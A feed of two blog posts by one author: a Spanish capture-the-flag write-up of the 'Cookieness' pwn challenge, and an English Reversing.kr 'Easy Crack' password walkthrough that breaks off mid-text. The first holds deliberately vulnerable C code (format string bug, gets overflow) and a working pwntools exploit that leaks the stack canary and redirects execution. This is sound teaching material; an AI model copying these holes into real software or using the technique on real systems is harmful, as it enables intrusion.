DEV Community: NtMerk The latest articles on DEV Community by NtMerk (@ntmerk). https://dev.to/ntmerk https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F681939%2F079ddc2b-799b-414a-9390-f54ef1aeddf3.png DEV Community: NtMerk https://dev.to/ntmerk en Cookieness write-up NtMerk Tue, 01 Nov 2022 13:35:33 +0000 https://dev.to/ntmerk/cookieness-write-up-d4a https://dev.to/ntmerk/cookieness-write-up-d4a <p>Cookieness es un reto de categoría pwn. Consiste en leer un fichero <em>flag.txt</em> mediante una vulnerabilidad de format string y un buffer overflow.</p> <h2> Código fuente </h2> <p>Si quieres probar a resolver este reto en tu máquina, crea un fichero <code>flag.txt</code> con cualquier contenido y compila el código siguiente de esta manera <code>gcc -m32 main.c -o cookieness -fstack-protector -no-pie</code>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp"> #include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp"> #include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp"> </span> <span class="kt">char</span> <span class="o">*</span> <span class="n">fileName</span> <span class="o">=</span> <span class="s">"flag.txt"</span><span class="p">;</span> <span class="kt">char</span> <span class="o">*</span> <span class="n">signature</span> <span class="o">=</span> <span class="s">"Merk was here."</span><span class="p">;</span> <span class="c1">// Unused function to print the first 100</span> <span class="c1">// chars of a file passed as an argument</span> <span class="kt">void</span> <span class="nf">print_file</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span> <span class="n">name</span><span class="p">)</span> <span class="p">{</span> <span class="kt">char</span> <span class="n">flag</span><span class="p">[</span><span class="mi">100</span><span class="p">];</span> <span class="kt">FILE</span> <span class="o">*</span> <span class="n">fp</span><span class="p">;</span> <span class="n">fp</span> <span class="o">=</span> <span class="n">fopen</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="s">"r"</span><span class="p">);</span> <span class="c1">// If the file can be opened and read, print its contents</span> <span class="k">if</span> <span class="p">(</span><span class="n">fgets</span><span class="p">(</span><span class="n">flag</span><span class="p">,</span> <span class="mi">100</span><span class="p">,</span> <span class="n">fp</span><span class="p">)</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Mostrando contenido de %s: %s"</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="n">flag</span><span class="p">);</span> <span class="k">else</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Fichero %s no encontrado."</span><span class="p">,</span> <span class="n">name</span><span class="p">);</span> <span class="p">}</span> <span class="kt">void</span> <span class="nf">welcome</span><span class="p">()</span> <span class="p">{</span> <span class="c1">// Ask user for input</span> <span class="n">printf</span><span class="p">(</span><span class="s">"%s"</span><span class="p">,</span> <span class="s">"Login: "</span><span class="p">);</span> <span class="c1">// Get user input</span> <span class="kt">char</span> <span class="n">strUser</span><span class="p">[</span><span class="mi">20</span><span class="p">];</span> <span class="n">fgets</span><span class="p">(</span><span class="n">strUser</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="n">stdin</span><span class="p">);</span> <span class="c1">// Print welcome message, followed by a printf</span> <span class="c1">// with a format string vulnerability</span> <span class="n">printf</span><span class="p">(</span><span class="s">"%s"</span><span class="p">,</span> <span class="s">"Bienvenido, "</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="n">strUser</span><span class="p">);</span> <span class="c1">// Get user input via vulnerable gets function</span> <span class="n">puts</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">Puedes leer flag.txt?"</span><span class="p">);</span> <span class="n">gets</span><span class="p">(</span><span class="n">strUser</span><span class="p">);</span> <span class="p">}</span> <span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span> <span class="n">argv</span><span class="p">[])</span> <span class="p">{</span> <span class="c1">// Vulnerable function</span> <span class="n">welcome</span><span class="p">();</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <p>Sin más dilación, vamos a resolverlo.</p> <h2> Reconocimiento </h2> <p>Un primer vistazo nos muestra que se trata de un binario de <strong>32 bits</strong>, <strong>dynamically linked</strong> y <strong>not stripped</strong> (así que quizá los símbolos nos puedan ayudar).<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>└─$ file cookieness     cookieness: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=3a32702afe6d664b62c9d 806d496072435a557e8, for GNU/Linux 3.2.0, not stripped </code></pre> </div> <p>Si ejecutamos <em>strings</em> en el binario, obtendremos una pista. El string <strong>flag.txt</strong> parece ser nuestro objetivo.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>└─$ strings cookieness ... flag.txt Merk was here. Mostrando contenido de %s: %s Fichero %s no encontrado. Login:   Bienvenido,   Puedes leer flag.txt? ... </code></pre> </div> <p>Cargando el binario con <code>gdb</code> y ejecutando <code>checksec</code>, podemos ver las siguientes protecciones habilitadas. </p> <ul> <li> <a href="https://ir0nstone.gitbook.io/notes/types/stack/canaries"><strong>CANARY</strong>/COOKIE</a> <ul> <li>Esto quiere decir que para sobrescribir EIP mediante un stack buffer overflow, necesitaremos conocer el valor de la cookie en cada ejecución.</li> </ul> </li> <li> <a href="https://ir0nstone.gitbook.io/notes/types/stack/no-execute"><strong>NX</strong> (No eXecute)/DEP</a> <ul> <li>Gracias a NX, no podremos ejecutar nuestro shellcode en el stack directamente. </li> </ul> </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>gdb-peda$ checksec CANARY    : ENABLED FORTIFY   : disabled NX        : ENABLED PIE       : disabled RELRO     : Partial </code></pre> </div> <p>Ejecutando el binario podemos observar que tenemos dos entradas, de las cuales la primera está reflejada por consola.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>└─$ ./cookieness Login: test1 Bienvenido, test1 Puedes leer flag.txt? test2 </code></pre> </div> <p>Probando podemos observar que la primera entrada tiene un format string vulnerability, y si gritamos un poco parece que la segunda es vulnerable a un buffer overflow (pero sobrescribimos la cookie y obtenemos un <strong>stack smashing detected</strong>).<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>└─$ ./cookieness Login: %x Bienvenido, 804a065 Puedes leer flag.txt? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA *** stack smashing detected ***: terminated zsh: IOT instruction  ./cookieness </code></pre> </div> <p>Por último, ya que el binario es <strong>not stripped</strong> podemos echarle un vistazo a las funciones.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>gdb-peda$ info functions   All defined functions: Non-debugging symbols: 0x08049000  _init ... 0x080491a6  print_file 0x08049243  welcome 0x080492f3  main ... 0x08049334  _fini </code></pre> </div> <p>Las funciones que pintan interesantes son <strong>print_file</strong>, <strong>welcome</strong> y <strong>main</strong>. Un vistazo rápido a <strong>print_file</strong> con cualquier decompiler nos revela que se utiliza para leer los contenidos de un fichero pasado como único argumento. Cabe destacar que esta función no se llama nunca.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="kt">unsigned</span> <span class="kt">int</span> <span class="kr">__cdecl</span> <span class="nf">print_file</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">a1</span><span class="p">)</span> <span class="p">{</span> <span class="kt">FILE</span> <span class="o">*</span><span class="n">stream</span><span class="p">;</span> <span class="c1">// ST24_4</span> <span class="kt">char</span> <span class="n">s</span><span class="p">;</span> <span class="c1">// [esp+18h] [ebp-70h]</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">v4</span><span class="p">;</span> <span class="c1">// [esp+7Ch] [ebp-Ch]</span> <span class="n">v4</span> <span class="o">=</span> <span class="n">__readgsdword</span><span class="p">(</span><span class="mh">0x14u</span><span class="p">);</span> <span class="n">stream</span> <span class="o">=</span> <span class="n">fopen</span><span class="p">(</span><span class="n">a1</span><span class="p">,</span> <span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">unk_804A020</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span> <span class="n">fgets</span><span class="p">(</span><span class="o">&amp;</span><span class="n">s</span><span class="p">,</span> <span class="mi">100</span><span class="p">,</span> <span class="n">stream</span><span class="p">)</span> <span class="p">)</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Mostrando contenido de %s: %s"</span><span class="p">,</span> <span class="n">a1</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">s</span><span class="p">);</span> <span class="k">else</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Fichero %s no encontrado."</span><span class="p">,</span> <span class="n">a1</span><span class="p">);</span> <span class="k">return</span> <span class="n">v4</span> <span class="o">-</span> <span class="n">__readgsdword</span><span class="p">(</span><span class="mh">0x14u</span><span class="p">);</span> <span class="p">}</span> </code></pre> </div> <h2> Pwning time </h2> <p>Teniendo en cuenta lo que acabamos de ver, una manera de resolver el reto consiste en:</p> <ol> <li>Leer el CANARY o COOKIE de la función <em>welcome</em> usando el format string vulnerability</li> <li>Hacer un stack buffer overflow usando el CANARY</li> <li>Redirigir EIP a la función <em>print_file</em> colocando en el stack un puntero a <em>flag.txt</em>, ya que cuando ejecutamos <strong>strings</strong>, vimos que existía</li> </ol> <p>El <em>printf</em> vulnerable que nos permite leer memoria del stack se encuentra en<br> <code>0x080492b3 &lt;+112&gt;:   call   0x8049040 &lt;printf@plt&gt;</code><br> Por lo que le colocaremos un breakpoint. Ejecutaremos el binario hasta el breakpoint, y comprobaremos dónde se encuentra el CANARY para poder leerlo.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>gdb-peda$ b * 0x080492b3 Breakpoint 1 at 0x80492b3 gdb-peda$ run Starting program: /home/merk/****/cookieness   [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Login: test Breakpoint 1, 0x080492b3 in welcome () </code></pre> </div> <p>Si miramos el final de la función <em>welcome</em>, podemos ver cómo se compara el CANARY. Veremos que sale de [ebp-0xc].<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>  0x080492dd &lt;+154&gt;:   mov    eax,DWORD PTR [ebp-0xc] &lt;--- aquí   0x080492e0 &lt;+157&gt;:   sub    eax,DWORD PTR gs:0x14   0x080492e7 &lt;+164&gt;:   je     0x80492ee &lt;welcome+171&gt;   0x080492e9 &lt;+166&gt;:   call   0x8049320 &lt;__stack_chk_fail_local&gt; </code></pre> </div> <p>Entonces comprobamos en qué posición de ESP se encuentra el CANARY. Se encuentra a 11 DWORDS de distancia.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>gdb-peda$ x/x $ebp-0xc 0xffffcdbc:     0xe4a1a300 &lt;--- los CANARY siempre terminan en 00 gdb-peda$ x/20x $esp 0xffffcd90:     0xffffcda8      0x0804a065      0xf7e21620      0x0804924f 0xffffcda0:     0xf7fbf4a0      0xf7fd7a6c      0x74736574      0xf7fb000a 0xffffcdb0:     0xffffcdf0      0xf7fbf66c      0xf7fbfb30      0xe4a1a300 &lt;--- aquí 0xffffcdc0:     0x00000001      0xf7e20ff4      0xffffcdd8      0x08049308 0xffffcdd0:     0xffffd09b      0x00000070      0xf7ffd020      0xf7c213b5 </code></pre> </div> <p>Por ello, si en la primera entrada del binario colocamos <strong>%11$x</strong>, imprimiremos el CANARY.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>└─$ ./cookieness Login: %11$x Bienvenido, 1e66b800 Puedes leer flag.txt? </code></pre> </div> <p>Ahora podemos intentar sobrescribirlo en la segunda entrada, y crashear el proceso con valores arbitrarios. Tenemos que saber a qué distancia se encuentra el CANARY de lo que sobrescribimos una vez se llama la función <em>gets</em>. Para ello, usaremos <code>pattern</code> de <em>gdb-peda</em> y veremos con qué offset sobrescribimos el CANARY.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>gdb-peda$ b * 0x080492e0 &lt;--- en esta dirección se comprueba el CANARY Breakpoint 1 at 0x80492e0 gdb-peda$ pattern create 50 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA' gdb-peda$ run Starting program: /home/merk/****/cookieness   Login: test Bienvenido, test Puedes leer flag.txt? AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA [----------------------------------registers-----------------------------------] EAX: 0x41412d41 ('A-AA') &lt;--- EAX contenía el CANARY, que hemos sobrescrito ... gdb-peda$ pattern offset 0x41412d41 1094790465 found at offset: 20 </code></pre> </div> <p>Ya sabemos que el CANARY se debe sobrescribir en el offset 20. Montando el siguiente script, veremos que hemos sobrescrito el CANARY y que podemos redirigir el programa.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="c1"># run the process </span><span class="n">p</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s">"./cookieness"</span><span class="p">)</span> <span class="n">gdb</span><span class="p">.</span><span class="n">attach</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="s">''' break welcome '''</span><span class="p">)</span> <span class="c1"># get the 11th stack variable (the canary/cookie) </span><span class="n">p</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="sa">b</span><span class="s">"%11$x</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span> <span class="c1"># read the cookie from the abused string format vulnerability </span><span class="n">cookie</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">readline</span><span class="p">(</span><span class="mi">20</span><span class="p">).</span><span class="n">decode</span><span class="p">().</span><span class="n">split</span><span class="p">(</span><span class="s">', '</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span> <span class="n">num</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">cookie</span><span class="p">,</span> <span class="mi">16</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="s">"Cookie = "</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">num</span><span class="p">))</span> <span class="c1"># build the payload </span><span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"A"</span> <span class="o">*</span> <span class="mi">20</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">p32</span><span class="p">(</span><span class="n">num</span><span class="p">)</span> <span class="c1"># get to the canary and overwrite it with itself </span><span class="n">payload</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"B"</span> <span class="o">*</span> <span class="mi">50</span> <span class="c1"># send the payload </span><span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> <span class="n">p</span><span class="p">.</span><span class="n">close</span><span class="p">()</span> </code></pre> </div> <p>Obtenemos un SIGSEGV.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Stopped reason: SIGSEGV 0x42424242 in ?? () </code></pre> </div> <p>Volvemos a usar <code>pattern</code> para comprobar la distancia desde el CANARY hasta EIP y obtenemos que está otros 12 bytes delante (no lo muestro porque es repetir el proceso). Ahora que podemos modificar EIP a nuestro gusto, solo nos queda apuntar a la función <code>print_file</code>, y pasar en el stack un puntero al string <em>flag.txt</em>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>gdb-peda$ break main Breakpoint 1 at 0x80492f6 gdb-peda$ run gdb-peda$ find flag.txt Searching for 'flag.txt' in: None ranges Found 4 results, display max 4 items: cookieness : 0x804a008 ("flag.txt") cookieness : 0x804a07f ("flag.txt?") cookieness : 0x804b008 ("flag.txt") cookieness : 0x804b07f ("flag.txt?") </code></pre> </div> <p>Podemos usar cualquiera de las dos que no tienen un <code>?</code> al final. Y solo quedará construir el script.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">print_file</span> <span class="o">=</span> <span class="mh">0x080491a6</span> <span class="n">flagtxt</span> <span class="o">=</span> <span class="mh">0x0804a008</span> <span class="c1"># run the process </span><span class="n">p</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s">"./cookieness"</span><span class="p">)</span> <span class="c1"># get the 11th stack variable (the canary/cookie) </span><span class="n">p</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="sa">b</span><span class="s">"%11$x</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span> <span class="c1"># read the cookie from the abused string format vulnerability </span><span class="n">cookie</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">readline</span><span class="p">(</span><span class="mi">20</span><span class="p">).</span><span class="n">decode</span><span class="p">().</span><span class="n">split</span><span class="p">(</span><span class="s">', '</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span> <span class="n">num</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">cookie</span><span class="p">,</span> <span class="mi">16</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="s">"Cookie = "</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">num</span><span class="p">))</span> <span class="c1"># build the payload </span><span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"A"</span> <span class="o">*</span> <span class="mi">20</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">p32</span><span class="p">(</span><span class="n">num</span><span class="p">)</span> <span class="c1"># get to the canary and overwrite it with itself </span><span class="n">payload</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"B"</span> <span class="o">*</span> <span class="mi">12</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">p32</span><span class="p">(</span><span class="n">print_file</span><span class="p">)</span> <span class="c1"># get to EIP and overwrite it with the print_file function </span><span class="n">payload</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"C"</span> <span class="o">*</span> <span class="mi">4</span> <span class="c1"># return address before parameters </span><span class="n">payload</span> <span class="o">+=</span> <span class="n">p32</span><span class="p">(</span><span class="n">flagtxt</span><span class="p">)</span> <span class="c1"># add an address that points to "flag.txt" to the stack as a parameter </span> <span class="c1"># send the payload </span><span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="c1"># jackpot </span><span class="k">print</span><span class="p">(</span><span class="n">p</span><span class="p">.</span><span class="n">recvall</span><span class="p">().</span><span class="n">decode</span><span class="p">())</span> <span class="n">p</span><span class="p">.</span><span class="n">close</span><span class="p">()</span> </code></pre> </div> <p>Y obtendríamos la flag.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>└─$ python3 exploit.py [+] Starting local process './cookieness': pid 2417 Cookie = 0x76d0fc00 [+] Receiving all data: Done (81B) [*] Stopped process './cookieness' (pid 2417) Puedes leer flag.txt? Mostrando contenido de flag.txt: SNH{this_is_a_test_flag} </code></pre> </div> Easy Crack NtMerk Mon, 01 Nov 2021 18:06:47 +0000 https://dev.to/ntmerk/easy-crack-9o8 https://dev.to/ntmerk/easy-crack-9o8 <h1> Welcome </h1> <p>Here's a quick introduction/presentation so you know what this is and why you're reading it. I'm <strong>Merk</strong>, a Software Engineering student that really likes <em>reverse engineering</em> (among other things).</p> <h3> What we're doing </h3> <p>In this series we will attempt to reverse engineer and complete challenges from the <a href="http://reversing.kr/">Reversing.kr</a> website. In this particular case, we will be reversing the password of the challenge <code>Easy Crack</code>.</p> <h3> Reconnaissance </h3> <p>We're given a Windows executable and must crack it. Using <a href="https://horsicq.github.io/">DIE</a> we can see it is a 32-bit executable and is not packed.<br> <a href="https://res.cloudinary.com/practicaldev/image/fetch/s--KSuek-E_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/cpdzcyh9n2di9w8irj0a.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--KSuek-E_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/cpdzcyh9n2di9w8irj0a.png" alt="Image description" width="450" height="48"></a><br> When we execute it, a window pops up. It asks for input and has a button.<br> <a href="https://res.cloudinary.com/practicaldev/image/fetch/s--0kw2QRey--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/optwctr08835whzdrm2k.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--0kw2QRey--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/optwctr08835whzdrm2k.png" alt="Image description" width="341" height="130"></a><br> If we input an arbitrary string such as "test", an error dialog appears telling us the password is incorrect.<br> <a href="https://res.cloudinary.com/practicaldev/image/fetch/s--nj3NzKHW--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pz4ebwh8k6sd9kridedb.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--nj3NzKHW--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pz4ebwh8k6sd9kridedb.png" alt="Image description" width="341" height="161"></a><br> Knowing what we know, there exist several ways to tackle this challenge:</p> <ul> <li> <p>We could straight up <strong>patch the program</strong> so that the flow of execution skips the error message and goes to the right place</p> <ul> <li>This would be <strong>the cracker's way</strong>; not the reverser's, and would also not give us points since we don't reverse engineer the password ;)</li> </ul> </li> <li> <p>We could look for <strong>string references</strong></p> <ul> <li>Given that the executable doesn't seem to have any protections, and knowing the string "Incorrect Password", this method can prove to be useful </li> </ul> </li> <li> <p>We could set a breakpoint on the <strong>Win32 API GetDlgItemText/A/W</strong></p> <ul> <li>Because of how the program window looks, it is very likely that the Dialog reads its content using this function</li> </ul> </li> </ul> <h3> x64dbg </h3> <p>We'll test our luck looking for <strong>string references</strong>. Let's fire up <a href="https://x64dbg.com/#start">x64dbg</a>, attach the executable and look for strings in the main module.<br> <a href="https://res.cloudinary.com/practicaldev/image/fetch/s--4fyOU7JO--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qwx51o59tqw55s50rpwt.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--4fyOU7JO--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qwx51o59tqw55s50rpwt.png" alt="Image description" width="592" height="679"></a><br> And there we have some meaningful strings:</p> <ul> <li>"Congratulation !!" - the good boy</li> <li>"Incorrect Password" - the bad boy</li> </ul> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--RkR-h0CS--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/s8721k38zmqrfkueul85.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--RkR-h0CS--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/s8721k38zmqrfkueul85.png" alt="Image description" width="880" height="68"></a><br> Addressing the references, we can take a look at the program logic in graph mode. The first thing we see is a comparison between the start of our input (ESP+4) and the character 'E'. So our string must commence with the letter 'E'.<br> <a href="https://res.cloudinary.com/practicaldev/image/fetch/s--C7mJApHd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nspdn0mmk9lce92iu7m3.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--C7mJApHd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nspdn0mmk9lce92iu7m3.png" alt="Image description" width="880" height="284"></a><br> Also, further up in the code, right bellow the call to the API GetDlgItemTextA (which we inferred right) is a comparison between ESP+5 and 'a', which means our second character must be the letter 'a'.<br> <a href="https://res.cloudinary.com/practicaldev/image/fetch/s--FGRypun3--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/n40twvxzoxtxkxeavl9r.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--FGRypun3--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/n40twvxzoxtxkxeavl9r.png" alt="Image description" width="599" height="45"></a><br> (This is what ESP is currently pointing to, that's why ESP+4 is the first letter and ESP+5 is the second)<br> <a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Z0gdNuW_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0tuvzcn0mswnwp3dsnsv.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Z0gdNuW_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0tuvzcn0mswnwp3dsnsv.png" alt="Image description" width="479" height="47"></a><br> So we know that the first two letters of the password are "Ea". <br> There also exists a function within the program that constantly <strong>returns 1</strong>, and makes the flow end up executing the bad boy. Taking a look inside, we can see it compares [EBP+C] which contains "5y" with our string starting from the third letter, which is stored in ESI. This is done via "repe cmpsb", which essentially compares several characters.<br> <a href="https://res.cloudinary.com/practicaldev/image/fetch/s--EZ7jtdaE--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5g2egk3ivl13yyoyq6f3.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--EZ7jtdaE--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5g2egk3ivl13yyoyq6f3.png" alt="Image description" width="525" height="27"></a><br> (ESI is pointing at the third character of our input, in this case the first 'a' in 0x19F7F2)<br> <a href="https://res.cloudinary.com/practicaldev/image/fetch/s--bQsfZc7O--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1kp7knroo8rtjnemg3i5.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--bQsfZc7O--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1kp7knroo8rtjnemg3i5.png" alt="Image description" width="526" height="38"></a><br> (EBP+C points to the characters "5y")<br> <a href="https://res.cloudinary.com/practicaldev/image/fetch/s--iXo3oK7X--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/59ybu885f3uijx9o4mgs.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--iXo3oK7X--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/59ybu885f3uijx9o4mgs.png" alt="Image description" width="427" height="30"></a><br> This means that our third and fourth letters must be "5y".<br> Changing our input to "Ea5y" will now make the function <strong>return 0</strong>, and the flow of execution gets further into the program.<br> <a href="https://res.cloudinary.com/practicaldev/image/fetch/s--9UPUX-x0--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xecmp2xog13zjaudciis.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--9UPUX-x0--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xecmp2xog13zjaudciis.png" alt="Image description" width="116" height="34"></a><br> If we keep looking further down in the code, x64dbg hints us that at some point in the code, the string <strong>"R3versing"</strong> is stored in ESI before some comparisons.<br> <a href="https://res.cloudinary.com/practicaldev/image/fetch/s--gbuIXdCk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/x3vvmp2dndablvmaptwf.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--gbuIXdCk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/x3vvmp2dndablvmaptwf.png" alt="Image description" width="650" height="19"></a><br> Without thinking much, we could infer that the correct input will be "Ea5y R3versing". However, we still missed something.<br> <a 